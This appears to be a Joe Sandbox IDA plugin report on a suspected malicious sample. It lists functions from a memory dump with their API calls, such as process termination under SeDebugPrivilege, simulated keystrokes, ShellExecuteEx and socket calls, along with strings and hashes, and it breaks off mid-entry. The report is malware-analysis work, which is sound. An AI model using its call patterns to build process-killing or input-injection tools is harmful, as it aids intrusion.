Opcode ID: 0d74cfde53630b82718c8343cd5476818f2e1522568eb0457e73f1ceca06830e
Instruction ID: d4b348f1083937724a392667623d5c364cdf95440e0b9e347e802bdf96ce121a
Opcode Fuzzy Hash: 0d74cfde53630b82718c8343cd5476818f2e1522568eb0457e73f1ceca06830e
Instruction Fuzzy Hash: E3913871D00219AFDB10DFA5DC84EDEBBB9AF08350F20816AF519B7292DB715A44CFA1

Function 000F6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 000F6E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 000F6E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 000F6E52
_wcscat.LIBCMT ref: 000F6EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 000F6EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 000F6EF2

Strings

SysListView32, xrefs: 000F6DF6

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 0189480772bbe45e160e05aef8b69faec93cdd40b77efa43bbbdee4dc45300d0
Instruction ID: 672602161c8f5e4151ad3764d082713161fd4d1c240a91c8a03c91ddba3204e4
Opcode Fuzzy Hash: 0189480772bbe45e160e05aef8b69faec93cdd40b77efa43bbbdee4dc45300d0
Instruction Fuzzy Hash: 82419F71A00309ABEB219F64CC85BFE77E8EF08750F10042AF644E7692D6729D84DB60

Function 000EE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 000D3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 000D3C7A
Part of subcall function 000D3C55: Process32FirstW.KERNEL32(00000000,?), ref: 000D3C88
Part of subcall function 000D3C55: CloseHandle.KERNEL32(00000000), ref: 000D3D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 000EE9A4
GetLastError.KERNEL32 ref: 000EE9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 000EE9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 000EEA63
GetLastError.KERNEL32(00000000), ref: 000EEA6E
CloseHandle.KERNEL32(00000000), ref: 000EEAA3

Strings

SeDebugPrivilege, xrefs: 000EE9C2

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 8d0b9afd92f2f86c279ba22f311816ceae5ffe7aa482a85c9e7aaf71d132d3ed
Instruction ID: e2f3321cea11bf6366f61bcf6f9cfee2dd8726b840525f101561ca347ef5b36f
Opcode Fuzzy Hash: 8d0b9afd92f2f86c279ba22f311816ceae5ffe7aa482a85c9e7aaf71d132d3ed
Instruction Fuzzy Hash: 6E4199316002059FDB20EF24C8A5FBDB7E5AF40314F18846CF946AB2D3DB75A904CBA6

Function 000D2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 000D3033

Strings

stop, xrefs: 000D3004
blank, xrefs: 000D2FB5
info, xrefs: 000D2FD4
question, xrefs: 000D2FEC
warning, xrefs: 000D301C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 73a47fd6aa63cb6738a3ce734e8fa68545e6377b6c503a8fcdc4b498cec05467
Instruction ID: 824a415c0a1f30003456ea19aedbef11aeab691505907614a4ff578b80071d7f
Opcode Fuzzy Hash: 73a47fd6aa63cb6738a3ce734e8fa68545e6377b6c503a8fcdc4b498cec05467
Instruction Fuzzy Hash: C311D831649346BEEB24AB54EC92DAF6BDC9F15360B10002BF900A6382DB655F4055B6

Function 000D42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 000D4312
LoadStringW.USER32(00000000), ref: 000D4319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 000D432F
LoadStringW.USER32(00000000), ref: 000D4336
_wprintf.LIBCMT ref: 000D435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 000D437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 000D4357

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 6810bf0dab0a3bfd55470f230b7dabd9c71c06601aa8b55eb11a0608a5f3df7e
Instruction ID: 4500eaa185ef15ee6929d38cd400f9bcd366060703042342285a4341ccd53d0b
Opcode Fuzzy Hash: 6810bf0dab0a3bfd55470f230b7dabd9c71c06601aa8b55eb11a0608a5f3df7e
Instruction Fuzzy Hash: C30162F2900209BFE75197A4DD89EFA776CEF08300F0005A2B745E2151EA785E859B74

Function 000FD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00072612: GetWindowLongW.USER32(?,000000EB), ref: 00072623

GetSystemMetrics.USER32(0000000F), ref: 000FD47C
GetSystemMetrics.USER32(0000000F), ref: 000FD49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 000FD6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 000FD6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 000FD716
ShowWindow.USER32(00000003,00000000), ref: 000FD735
InvalidateRect.USER32(?,00000000,00000001), ref: 000FD75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 000FD77D

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 0a8b311e2d5404461df90fec3fd69d6177a022e35e334a7c8a34f285294c272f
Instruction ID: ddffaea38199bf03d6f2a2197dac2b59d50d0af2dfe6d66bda27cace282cfe9e
Opcode Fuzzy Hash: 0a8b311e2d5404461df90fec3fd69d6177a022e35e334a7c8a34f285294c272f
Instruction Fuzzy Hash: B0B19A71600619EBDF14DF68C9857BD7BF2BF04701F08806AEE489FA95E734A950EB90

Function 00072A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,000AC1C7,00000004,00000000,00000000,00000000), ref: 00072ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,000AC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00072B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,000AC1C7,00000004,00000000,00000000,00000000), ref: 000AC21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,000AC1C7,00000004,00000000,00000000,00000000), ref: 000AC286

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 8540481cc425c19f37fb9a4780a22fb9f4710ca5d153b22869cb6d5e8a76a8e0
Instruction ID: a5914fc874a8919fe9f729f561eecc97b6db09677c7af5571bcfb8886e26418b
Opcode Fuzzy Hash: 8540481cc425c19f37fb9a4780a22fb9f4710ca5d153b22869cb6d5e8a76a8e0
Instruction Fuzzy Hash: 25411B30E08780BBE7759B688C89B7F7BD2AF46300F19C419E04F86561C73C9881D716

Function 000D70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 000D70DD

Part of subcall function 00090DB6: std::exception::exception.LIBCMT ref: 00090DEC
Part of subcall function 00090DB6: __CxxThrowException@8.LIBCMT ref: 00090E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 000D7114
EnterCriticalSection.KERNEL32(?), ref: 000D7130
_memmove.LIBCMT ref: 000D717E
_memmove.LIBCMT ref: 000D719B
LeaveCriticalSection.KERNEL32(?), ref: 000D71AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 000D71BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 000D71DE

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: b746df73d0c01e50b2428a3263a35ef3c073d9e4b10143a6ddae8db23ebd2b94
Instruction ID: 32c70913f4040a0a1c79e2c24c65300c76fa991d3d110ac0314ef9d11c728f65
Opcode Fuzzy Hash: b746df73d0c01e50b2428a3263a35ef3c073d9e4b10143a6ddae8db23ebd2b94
Instruction Fuzzy Hash: 3C316E36900205EFDF10EFA8DC859BAB7B8EF45710F1541A5E9049B256EB349E10DB60

Function 000F61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 000F61EB
GetDC.USER32(00000000), ref: 000F61F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 000F61FE
ReleaseDC.USER32(00000000,00000000), ref: 000F620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 000F6246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000F6257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,000F902A,?,?,000000FF,00000000,?,000000FF,?), ref: 000F6291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000F62B1

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 2bbbae52dee7ceb2b8e4498b1c16b638b4f589f6b60a3b3a2271692eb3e180cd
Instruction ID: a0c07c5c830107e66b51d696347232c9cb7ac856a94d637f4a39f612aa66bd64
Opcode Fuzzy Hash: 2bbbae52dee7ceb2b8e4498b1c16b638b4f589f6b60a3b3a2271692eb3e180cd
Instruction Fuzzy Hash: E7314D72101614BFEF118F50CC8AFFA3BA9EF49765F044065FE08DA691CA799841DB64

Function 000CBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 000CBBC4
_memcmp.LIBCMT ref: 000CBBE6
_memcmp.LIBCMT ref: 000CBBFE
_memcmp.LIBCMT ref: 000CBC11
_memcmp.LIBCMT ref: 000CBC2B
_memcmp.LIBCMT ref: 000CBC3E
_memcmp.LIBCMT ref: 000CBC56
_memcmp.LIBCMT ref: 000CBC71

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: e3450f9354069da8ada2c986b26674991833bb13b5ffee465ce9f461a48a4b1f
Instruction ID: 9ebfa20f650121cb4aa363a3dfe38684b65c4f31b6a5d425ad09bdc218bb1f44
Opcode Fuzzy Hash: e3450f9354069da8ada2c986b26674991833bb13b5ffee465ce9f461a48a4b1f
Instruction Fuzzy Hash: 7721F07170121A7BEA1567219D83FFF739CAF14388F084029FD0496687EBA4DE1192E1

Function 000DEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00079837: __itow.LIBCMT ref: 00079862
Part of subcall function 00079837: __swprintf.LIBCMT ref: 000798AC

Part of subcall function 0008FC86: _wcscpy.LIBCMT ref: 0008FCA9

_wcstok.LIBCMT ref: 000DEC94
_wcscpy.LIBCMT ref: 000DED23
_memset.LIBCMT ref: 000DED56

Strings

X, xrefs: 000DED93

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: e753f1852518d0192ca3966b21d9782fe8a0192f043c6c7b67a3450d53aac72f
Instruction ID: 4625bb6e999fa14035ce11e67756fd5a98ded44285fcdd95e45a67d31d9bfb84
Opcode Fuzzy Hash: e753f1852518d0192ca3966b21d9782fe8a0192f043c6c7b67a3450d53aac72f
Instruction Fuzzy Hash: 48C17F319083419FC764EF24C945AAAB7E4FF85310F00892DF9999B3A2DB74EC45CB96

Function 000E6B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 000E6C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 000E6C21
WSAGetLastError.WSOCK32(00000000), ref: 000E6C34
htons.WSOCK32(?,?,?,00000000,?), ref: 000E6CEA
inet_ntoa.WSOCK32(?), ref: 000E6CA7

Part of subcall function 000CA7E9: _strlen.LIBCMT ref: 000CA7F3
Part of subcall function 000CA7E9: _memmove.LIBCMT ref: 000CA815

_strlen.LIBCMT ref: 000E6D44
_memmove.LIBCMT ref: 000E6DAD

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 0a31693773c3ba0f0ee94f05632cc93e03bbfde1bfba5ab70b089faa192ddf35
Instruction ID: 0152e1dcc920770c9f902e8c14524dc8678894f3bc208e854dc2d4696e3a3ea4
Opcode Fuzzy Hash: 0a31693773c3ba0f0ee94f05632cc93e03bbfde1bfba5ab70b089faa192ddf35
Instruction Fuzzy Hash: 2781F371A08340AFC720EB25DC85EAEB7E8AF94314F50891CF559AB293DB75DD01C752

Function 00071424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf070bfa478586f7a717e018f0054cfcaa24f07ab44da28abcd01cec6687f82
Instruction ID: 84c6a118d1ba49bc55fd6c6382fb6dfa7a56fd421f6758127d06855f3e893018
Opcode Fuzzy Hash: 5bf070bfa478586f7a717e018f0054cfcaa24f07ab44da28abcd01cec6687f82
Instruction Fuzzy Hash: B8714C70D04109EFDB148F98CC49AFEBBB9FF85314F14C159F919AA292C738AA51CB64

Function 000FB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01524C18), ref: 000FB3EB
IsWindowEnabled.USER32(01524C18), ref: 000FB3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 000FB4DB
SendMessageW.USER32(01524C18,000000B0,?,?), ref: 000FB512
IsDlgButtonChecked.USER32(?,?), ref: 000FB54F
GetWindowLongW.USER32(01524C18,000000EC), ref: 000FB571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 000FB589

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: b41f0669a4f624edc784e63cb4222cd4e19489b18c49b0de549cebfc5bd0ea11
Instruction ID: eebc641db5d79cdd1910967e108577584afd0ce6a545f42c12a101756e9f8113
Opcode Fuzzy Hash: b41f0669a4f624edc784e63cb4222cd4e19489b18c49b0de549cebfc5bd0ea11
Instruction Fuzzy Hash: A1719E34604609EFEB209F54C994FBABBF9EF49300F148059FB4597AA2C735A940EF50

Function 000EF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000EF448
_memset.LIBCMT ref: 000EF511
ShellExecuteExW.SHELL32(?), ref: 000EF556

Part of subcall function 00079837: __itow.LIBCMT ref: 00079862
Part of subcall function 00079837: __swprintf.LIBCMT ref: 000798AC

Part of subcall function 0008FC86: _wcscpy.LIBCMT ref: 0008FCA9

GetProcessId.KERNEL32(00000000), ref: 000EF5CD
CloseHandle.KERNEL32(00000000), ref: 000EF5FC

Strings

@, xrefs: 000EF525

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 8f75b0286ab883b514cde9602f3f4c93de421d3554745fded4972621640c1763
Instruction ID: fecc939243cb5e522b89082c671f8ee9c67bfc966733933c0c2bf9db8c81bcc2
Opcode Fuzzy Hash: 8f75b0286ab883b514cde9602f3f4c93de421d3554745fded4972621640c1763
Instruction Fuzzy Hash: 1061AC71E0065A9FCB14EF65C4859AEBBF4FF49310F148069E859BB352CB34AE41CB94

Function 000D0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 000D0F8C
GetKeyboardState.USER32(?), ref: 000D0FA1
SetKeyboardState.USER32(?), ref: 000D1002
PostMessageW.USER32(?,00000101,00000010,?), ref: 000D1030
PostMessageW.USER32(?,00000101,00000011,?), ref: 000D104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 000D1095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 000D10B8

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 3b3af72c9318ae2e80248fa8b555afd9c3e911f1112155faf1ebfd8cc75e3f97
Instruction ID: cd4b7ea2373a897a5b4bbdcb45e3bf682d1493a5c8727c6753d752ec5ec11961
Opcode Fuzzy Hash: 3b3af72c9318ae2e80248fa8b555afd9c3e911f1112155faf1ebfd8cc75e3f97
Instruction Fuzzy Hash: C251C0B06047D639FB3653348C45BFABEE95B06304F08858AE1D8869D3CAD9ACD8D771

Function 000D0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 000D0DA5
GetKeyboardState.USER32(?), ref: 000D0DBA
SetKeyboardState.USER32(?), ref: 000D0E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 000D0E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 000D0E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 000D0EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 000D0EC9

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 1b13a1ad88b353b63c409d6240a50152625451a370e5aa11934ab20f2af4cf01
Instruction ID: ff730e0f1dba5d34afb70166d7df983689c6fa667d03a5b9dffa0abc266faae8
